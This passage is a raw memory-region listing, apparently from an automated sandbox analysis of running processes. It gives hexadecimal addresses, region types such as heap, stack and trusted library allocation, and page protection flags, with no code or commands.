page read and write
|
||
10E5000
|
heap
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
7FF887DE0000
|
trusted library allocation
|
page read and write
|
||
1BF80000
|
trusted library allocation
|
page read and write
|
||
2A5A9175000
|
heap
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
7FF887A23000
|
trusted library allocation
|
page read and write
|
||
22BF7AA3000
|
heap
|
page read and write
|
||
1BBC0000
|
trusted library allocation
|
page read and write
|
||
2745A990000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF859B000
|
heap
|
page read and write
|
||
7FF887A83000
|
trusted library allocation
|
page execute and read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
22BF857C000
|
heap
|
page read and write
|
||
1BAC0000
|
trusted library allocation
|
page read and write
|
||
2276000
|
heap
|
page read and write
|
||
27474AF0000
|
heap
|
page read and write
|
||
25F0000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
27474B1C000
|
heap
|
page read and write
|
||
1B4BC000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
7FF887BF0000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
1CB636EA000
|
heap
|
page read and write
|
||
2180000
|
heap
|
page execute and read and write
|
||
2745A803000
|
heap
|
page read and write
|
||
22BF7A3C000
|
heap
|
page read and write
|
||
1EA0000
|
trusted library allocation
|
page read and write
|
||
1AB20000
|
trusted library allocation
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
FE0000
|
heap
|
page read and write
|
||
7FF887A34000
|
trusted library allocation
|
page read and write
|
||
1AD0A000
|
heap
|
page read and write
|
||
CB0000
|
heap
|
page read and write
|
||
2920000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7D07000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
23D22A25000
|
heap
|
page read and write
|
||
D41000
|
heap
|
page read and write
|
||
2745C260000
|
trusted library allocation
|
page read and write
|
||
22BF8534000
|
heap
|
page read and write
|
||
1B07E1A0000
|
heap
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
2745D6A2000
|
trusted library allocation
|
page read and write
|
||
22BF7A41000
|
heap
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
7FF887A62000
|
trusted library allocation
|
page read and write
|
||
E90000
|
heap
|
page read and write
|
||
22BF7C70000
|
heap
|
page read and write
|
||
22BF8534000
|
heap
|
page read and write
|
||
1BAA0000
|
trusted library allocation
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
A489538000
|
stack
|
page read and write
|
||
1B4B0000
|
trusted library allocation
|
page read and write
|
||
2745CE0B000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
22BF85DF000
|
heap
|
page read and write
|
||
1B760000
|
trusted library allocation
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
12F58000
|
trusted library allocation
|
page read and write
|
||
D30000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1BB20000
|
trusted library allocation
|
page read and write
|
||
22BF85A5000
|
heap
|
page read and write
|
||
5D6000
|
heap
|
page read and write
|
||
1AD0A000
|
heap
|
page read and write
|
||
A708EB8000
|
stack
|
page read and write
|
||
27474C7D000
|
heap
|
page read and write
|
||
22BF7BFD000
|
heap
|
page read and write
|
||
2F40000
|
heap
|
page read and write
|
||
1ACD0000
|
trusted library allocation
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
22BF8529000
|
heap
|
page read and write
|
||
3712000
|
stack
|
page read and write
|
||
1B7B0000
|
trusted library allocation
|
page read and write
|
||
979000
|
unkown
|
page readonly
|
||
1CB636DE000
|
heap
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B7E0000
|
trusted library allocation
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1B55A000
|
trusted library allocation
|
page read and write
|
||
AF5000
|
heap
|
page read and write
|
||
22BF7A92000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
C90000
|
heap
|
page read and write
|
||
22BF80A7000
|
unkown
|
page read and write
|
||
2411000
|
trusted library allocation
|
page read and write
|
||
1C8E2000
|
unkown
|
page read and write
|
||
22BF8509000
|
heap
|
page read and write
|
||
632B000
|
stack
|
page read and write
|
||
1B010639000
|
trusted library allocation
|
page read and write
|
||
1ADAE000
|
heap
|
page read and write
|
||
23D229AE000
|
heap
|
page read and write
|
||
1B001DBF000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
22BF850B000
|
heap
|
page read and write
|
||
22BF7B9C000
|
heap
|
page read and write
|
||
10A0000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
7FF887A60000
|
trusted library allocation
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
7FF887AD0000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
1CB4B312000
|
trusted library allocation
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AC80000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1BAD0000
|
trusted library allocation
|
page read and write
|
||
22BF7DC0000
|
trusted library allocation
|
page read and write
|
||
1ABB0000
|
trusted library allocation
|
page read and write
|
||
1ABE0000
|
trusted library allocation
|
page read and write
|
||
1B000090000
|
trusted library allocation
|
page read and write
|
||
1B8C0000
|
trusted library allocation
|
page read and write
|
||
22BF7C80000
|
heap
|
page read and write
|
||
1BBED000
|
trusted library allocation
|
page read and write
|
||
44D2BB8000
|
stack
|
page read and write
|
||
2A5A917C000
|
heap
|
page read and write
|
||
593B000
|
heap
|
page read and write
|
||
4980000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1B450000
|
trusted library allocation
|
page read and write
|
||
A48A30A000
|
stack
|
page read and write
|
||
1B510000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1CB5B0F0000
|
trusted library allocation
|
page read and write
|
||
22BF8518000
|
heap
|
page read and write
|
||
1B4B0000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1B490000
|
trusted library allocation
|
page read and write
|
||
1B018DE0000
|
heap
|
page read and write
|
||
2624000
|
heap
|
page read and write
|
||
1AA90000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
2973000
|
heap
|
page read and write
|
||
2746C705000
|
trusted library allocation
|
page read and write
|
||
27474F64000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
49C0000
|
heap
|
page read and write
|
||
22BF7AB8000
|
heap
|
page read and write
|
||
1CB4C8D2000
|
trusted library allocation
|
page read and write
|
||
1BA50000
|
trusted library allocation
|
page read and write
|
||
7FF887CC0000
|
trusted library allocation
|
page read and write
|
||
1B5D0000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF7A28000
|
heap
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
2B29000
|
heap
|
page read and write
|
||
1AC0A000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
2DCF000
|
trusted library allocation
|
page read and write
|
||
27474C79000
|
heap
|
page read and write
|
||
23EA000
|
trusted library allocation
|
page read and write
|
||
1B580000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
C18000
|
heap
|
page read and write
|
||
2932000
|
heap
|
page read and write
|
||
2B54000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1BAE0000
|
trusted library allocation
|
page read and write
|
||
22BF7AA8000
|
heap
|
page read and write
|
||
1B470000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
2A95000
|
heap
|
page read and write
|
||
7FF887A9C000
|
trusted library allocation
|
page execute and read and write
|
||
1B820000
|
trusted library allocation
|
page read and write
|
||
1B018BC5000
|
heap
|
page read and write
|
||
1B002195000
|
trusted library allocation
|
page read and write
|
||
1B960000
|
trusted library allocation
|
page read and write
|
||
22BF7BFD000
|
heap
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
27474C14000
|
heap
|
page read and write
|
||
1B018B1F000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AC81000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1ADD0000
|
heap
|
page read and write
|
||
27474F83000
|
heap
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
2DF0000
|
trusted library allocation
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
7FF887CB0000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
2B90000
|
heap
|
page read and write
|
||
1B7AC000
|
heap
|
page execute and read and write
|
||
23D20D49000
|
unkown
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
1B018B6A000
|
heap
|
page read and write
|
||
7FF887D10000
|
trusted library allocation
|
page read and write
|
||
765000
|
stack
|
page read and write
|
||
1B480000
|
trusted library allocation
|
page read and write
|
||
1ABA0000
|
trusted library allocation
|
page read and write
|
||
1E87A1A6000
|
heap
|
page read and write
|
||
1AC98000
|
heap
|
page read and write
|
||
23D20D5C000
|
unkown
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
2A5A9100000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1B580000
|
heap
|
page execute and read and write
|
||
C6A000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7C4F000
|
heap
|
page read and write
|
||
7DF4700F0000
|
trusted library allocation
|
page execute and read and write
|
||
2603000
|
heap
|
page read and write
|
||
C74000
|
stack
|
page read and write
|
||
7FF887D70000
|
trusted library allocation
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
22BF8543000
|
heap
|
page read and write
|
||
2745E24F000
|
trusted library allocation
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
1AB77000
|
trusted library allocation
|
page read and write
|
||
1B7D0000
|
trusted library allocation
|
page read and write
|
||
2B31000
|
heap
|
page read and write
|
||
A48907E000
|
stack
|
page read and write
|
||
1CB6350E000
|
heap
|
page read and write
|
||
7FF887DA0000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1CB495E0000
|
heap
|
page readonly
|
||
1ABC0000
|
trusted library allocation
|
page read and write
|
||
7FF887A4D000
|
trusted library allocation
|
page execute and read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1BA50000
|
trusted library allocation
|
page read and write
|
||
1BBB0000
|
trusted library allocation
|
page read and write
|
||
1AAE0000
|
trusted library allocation
|
page read and write
|
||
1AB61000
|
trusted library allocation
|
page read and write
|
||
1AA73000
|
trusted library allocation
|
page read and write
|
||
1BAD0000
|
trusted library allocation
|
page read and write
|
||
1B532000
|
trusted library allocation
|
page read and write
|
||
7FF887C21000
|
trusted library allocation
|
page read and write
|
||
27474884000
|
heap
|
page read and write
|
||
2B8D000
|
stack
|
page read and write
|
||
44D28FD000
|
stack
|
page read and write
|
||
1B9E0000
|
trusted library allocation
|
page read and write
|
||
CA8000
|
heap
|
page read and write
|
||
1AB63000
|
trusted library allocation
|
page read and write
|
||
22BF7A15000
|
heap
|
page read and write
|
||
CEB000
|
heap
|
page read and write
|
||
1CB4D0B6000
|
trusted library allocation
|
page read and write
|
||
2745A7E1000
|
heap
|
page read and write
|
||
5941000
|
heap
|
page read and write
|
||
7FF887CE0000
|
trusted library allocation
|
page read and write
|
||
1B018690000
|
heap
|
page read and write
|
||
7FF887C07000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1ACAC000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1AC6D000
|
heap
|
page read and write
|
||
2937000
|
heap
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B00167F000
|
trusted library allocation
|
page read and write
|
||
22BF8533000
|
heap
|
page read and write
|
||
2650000
|
heap
|
page read and write
|
||
23D20FF0000
|
unkown
|
page read and write
|
||
1CB4B080000
|
heap
|
page execute and read and write
|
||
22BF8594000
|
heap
|
page read and write
|
||
2F51000
|
trusted library allocation
|
page read and write
|
||
7FF8DF000000
|
unkown
|
page readonly
|
||
22BF7C3F000
|
heap
|
page read and write
|
||
7FF887DC9000
|
trusted library allocation
|
page read and write
|
||
7FF887B26000
|
trusted library allocation
|
page execute and read and write
|
||
1AB0D000
|
stack
|
page read and write
|
||
2745A7FE000
|
heap
|
page read and write
|
||
7FF887A82000
|
trusted library allocation
|
page read and write
|
||
1B790000
|
trusted library allocation
|
page read and write
|
||
E445B4B000
|
stack
|
page read and write
|
||
7FF887A42000
|
trusted library allocation
|
page read and write
|
||
23D20DB0000
|
heap
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
2294000
|
heap
|
page read and write
|
||
1AD0A000
|
heap
|
page read and write
|
||
7FF78289D000
|
direct allocation
|
page execute and read and write
|
||
7FF887A20000
|
trusted library allocation
|
page read and write
|
||
22BF7A0A000
|
heap
|
page read and write
|
||
12399000
|
trusted library allocation
|
page read and write
|
||
1B490000
|
trusted library allocation
|
page read and write
|
||
A48A18E000
|
stack
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
7FF887D26000
|
trusted library allocation
|
page read and write
|
||
1CB49455000
|
heap
|
page read and write
|
||
7FF887B06000
|
trusted library allocation
|
page execute and read and write
|
||
2811000
|
heap
|
page read and write
|
||
22BF7AAB000
|
heap
|
page read and write
|
||
170000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
C69000
|
heap
|
page read and write
|
||
22BF7AA8000
|
heap
|
page read and write
|
||
1B0000D0000
|
trusted library allocation
|
page read and write
|
||
27474B00000
|
heap
|
page read and write
|
||
5965000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
2946000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF7A0F000
|
heap
|
page read and write
|
||
552000
|
heap
|
page read and write
|
||
22BF85BD000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1CB494B6000
|
heap
|
page read and write
|
||
1BA20000
|
trusted library allocation
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
7FF887C50000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B6D0000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
B30000
|
heap
|
page read and write
|
||
1BA80000
|
trusted library allocation
|
page read and write
|
||
22BF8535000
|
heap
|
page read and write
|
||
7FF887B40000
|
trusted library allocation
|
page execute and read and write
|
||
1CB494E4000
|
heap
|
page read and write
|
||
1B910000
|
trusted library allocation
|
page read and write
|
||
22BF85CD000
|
heap
|
page read and write
|
||
1B018790000
|
heap
|
page execute and read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
1CB5B152000
|
trusted library allocation
|
page read and write
|
||
1ACAF000
|
heap
|
page read and write
|
||
1BAB0000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1B00153A000
|
trusted library allocation
|
page read and write
|
||
22BF7A79000
|
heap
|
page read and write
|
||
1CB6344F000
|
heap
|
page read and write
|
||
7FF887A74000
|
trusted library allocation
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
7FF8DF02D000
|
unkown
|
page readonly
|
||
22BF85CD000
|
heap
|
page read and write
|
||
1B001CC5000
|
trusted library allocation
|
page read and write
|
||
22BF7A06000
|
heap
|
page read and write
|
||
1E879EA0000
|
heap
|
page read and write
|
||
1B001179000
|
trusted library allocation
|
page read and write
|
||
1ACA4000
|
heap
|
page read and write
|
||
1BCF0000
|
trusted library allocation
|
page read and write
|
||
7FF887C03000
|
trusted library allocation
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7CC0000
|
unkown
|
page read and write
|
||
1B7B0000
|
trusted library allocation
|
page read and write
|
||
1ACC0000
|
trusted library allocation
|
page read and write
|
||
1AB50000
|
trusted library allocation
|
page read and write
|
||
22BF85F1000
|
heap
|
page read and write
|
||
1AADAEA0000
|
heap
|
page read and write
|
||
27474F30000
|
heap
|
page read and write
|
||
2746C707000
|
trusted library allocation
|
page read and write
|
||
1CB49474000
|
heap
|
page read and write
|
||
1ADF3000
|
heap
|
page read and write
|
||
274747EA000
|
heap
|
page read and write
|
||
2745C225000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
23D22AA1000
|
heap
|
page read and write
|
||
1BA00000
|
trusted library allocation
|
page read and write
|
||
B78000
|
stack
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
7FF887C90000
|
trusted library allocation
|
page read and write
|
||
274747A0000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1EC0000
|
trusted library allocation
|
page read and write
|
||
1AAA0000
|
trusted library allocation
|
page read and write
|
||
7FF887A70000
|
trusted library allocation
|
page read and write
|
||
7FF887C70000
|
trusted library allocation
|
page read and write
|
||
1B920000
|
trusted library allocation
|
page read and write
|
||
24A2C840000
|
heap
|
page read and write
|
||
A708BFE000
|
stack
|
page read and write
|
||
22BF7A28000
|
heap
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
2F30000
|
heap
|
page execute and read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
7FF887D00000
|
trusted library allocation
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
7FF78288D000
|
direct allocation
|
page execute and read and write
|
||
2745C48A000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
1B693000
|
heap
|
page read and write
|
||
22BF7C40000
|
heap
|
page read and write
|
||
1AB50000
|
trusted library allocation
|
page read and write
|
||
1BB30000
|
trusted library allocation
|
page read and write
|
||
22BF7A3C000
|
heap
|
page read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
1E87A070000
|
heap
|
page read and write
|
||
2A90000
|
heap
|
page read and write
|
||
22BF7ABB000
|
heap
|
page read and write
|
||
1B9A0000
|
trusted library allocation
|
page read and write
|
||
1ADD0000
|
heap
|
page read and write
|
||
2A5A90F0000
|
heap
|
page readonly
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
A70913E000
|
stack
|
page read and write
|
||
1AB90000
|
trusted library allocation
|
page read and write
|
||
23D20DF0000
|
trusted library allocation
|
page read and write
|
||
23D20E00000
|
direct allocation
|
page execute and read and write
|
||
7FF887A60000
|
trusted library allocation
|
page read and write
|
||
2288000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
2745AB70000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
2613000
|
heap
|
page read and write
|
||
1B480000
|
heap
|
page read and write
|
||
7FF887A90000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF857C000
|
heap
|
page read and write
|
||
1BB40000
|
trusted library allocation
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
7FF887D30000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
21E4000
|
heap
|
page read and write
|
||
23D22A60000
|
heap
|
page read and write
|
||
7FF887C60000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AC60000
|
trusted library allocation
|
page read and write
|
||
7FF887A90000
|
trusted library allocation
|
page read and write
|
||
2B0E000
|
stack
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
7DF431876000
|
unkown
|
page read and write
|
||
7FF887C00000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AB63000
|
trusted library allocation
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
22BF5887000
|
heap
|
page read and write
|
||
1B0003C4000
|
trusted library allocation
|
page read and write
|
||
1AEA0000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B6B0000
|
trusted library allocation
|
page read and write
|
||
2745DF01000
|
trusted library allocation
|
page read and write
|
||
7FF8DEFB1000
|
unkown
|
page execute read
|
||
22BF7C70000
|
heap
|
page read and write
|
||
22BF7CC0000
|
unkown
|
page read and write
|
||
22BF7C4F000
|
heap
|
page read and write
|
||
24A2E343000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
2699000
|
trusted library allocation
|
page read and write
|
||
22BF7C70000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
AD0000
|
heap
|
page read and write
|
||
22BF7C28000
|
heap
|
page read and write
|
||
22BF7C3F000
|
heap
|
page read and write
|
||
12391000
|
trusted library allocation
|
page read and write
|
||
23D20E4B000
|
heap
|
page read and write
|
||
281E000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF8511000
|
heap
|
page read and write
|
||
7FF887AD0000
|
trusted library allocation
|
page execute and read and write
|
||
2746C47F000
|
trusted library allocation
|
page read and write
|
||
1AB63000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
297D000
|
heap
|
page read and write
|
||
22BF858C000
|
heap
|
page read and write
|
||
12F51000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
7FF7177BC000
|
unkown
|
page readonly
|
||
23D229A1000
|
heap
|
page read and write
|
||
7FF887C80000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1AF10000
|
heap
|
page read and write
|
||
7FF887DD0000
|
trusted library allocation
|
page read and write
|
||
2745C638000
|
trusted library allocation
|
page read and write
|
||
1BC00000
|
trusted library allocation
|
page read and write
|
||
22BF8516000
|
heap
|
page read and write
|
||
1AE50000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
7FF887C32000
|
trusted library allocation
|
page read and write
|
||
7FF887CF0000
|
trusted library allocation
|
page read and write
|
||
1B4C0000
|
trusted library allocation
|
page read and write
|
||
22BF7FA0000
|
unkown
|
page read and write
|
||
1BF92000
|
direct allocation
|
page execute and read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
7FF887E90000
|
trusted library allocation
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
28F0000
|
trusted library allocation
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
7FF887B00000
|
trusted library allocation
|
page read and write
|
||
1AB8C000
|
heap
|
page execute and read and write
|
||
1B470000
|
trusted library allocation
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
2DCD000
|
trusted library allocation
|
page read and write
|
||
22BF7C50000
|
heap
|
page read and write
|
||
22BF8523000
|
heap
|
page read and write
|
||
7FF717701000
|
unkown
|
page execute read
|
||
22BF85D4000
|
heap
|
page read and write
|
||
2A5AAC40000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
1B500000
|
trusted library allocation
|
page read and write
|
||
1AB80000
|
heap
|
page execute and read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
6A7000
|
unkown
|
page readonly
|
||
7FF887BF1000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
5AB29F4000
|
stack
|
page read and write
|
||
1B561000
|
direct allocation
|
page execute and read and write
|
||
7FF887A2D000
|
trusted library allocation
|
page execute and read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1BA10000
|
trusted library allocation
|
page read and write
|
||
A708B79000
|
stack
|
page read and write
|
||
23D20E20000
|
heap
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
22BF85C4000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
23D22990000
|
heap
|
page read and write
|
||
1B7E0000
|
trusted library allocation
|
page read and write
|
||
4AC0000
|
trusted library allocation
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1C580000
|
unkown
|
page read and write
|
||
1B07E2DA000
|
heap
|
page read and write
|
||
23D229B0000
|
heap
|
page read and write
|
||
5A24000
|
heap
|
page read and write
|
||
2B0F000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
23D22AA0000
|
heap
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
10D0000
|
heap
|
page read and write
|
||
22BF7A41000
|
heap
|
page read and write
|
||
22BF7A40000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
22BF8016000
|
unkown
|
page read and write
|
||
1CB4C780000
|
trusted library allocation
|
page read and write
|
||
1CB49476000
|
heap
|
page read and write
|
||
22BF7C4A000
|
heap
|
page read and write
|
||
1AC0F000
|
trusted library allocation
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
7FF887B10000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887F10000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
1B018789000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF8513000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF7C27000
|
heap
|
page read and write
|
||
1ABD0000
|
trusted library allocation
|
page read and write
|
||
1BBF0000
|
trusted library allocation
|
page read and write
|
||
1B970000
|
trusted library allocation
|
page read and write
|
||
23D20FF0000
|
trusted library allocation
|
page read and write
|
||
7FF887AF6000
|
trusted library allocation
|
page read and write
|
||
7FF887A72000
|
trusted library allocation
|
page read and write
|
||
2745A801000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7A9E000
|
heap
|
page read and write
|
||
7FF887AC6000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
A4893F9000
|
stack
|
page read and write
|
||
22BF7A07000
|
heap
|
page read and write
|
||
7DF47F060000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887D40000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF86FD000
|
heap
|
page read and write
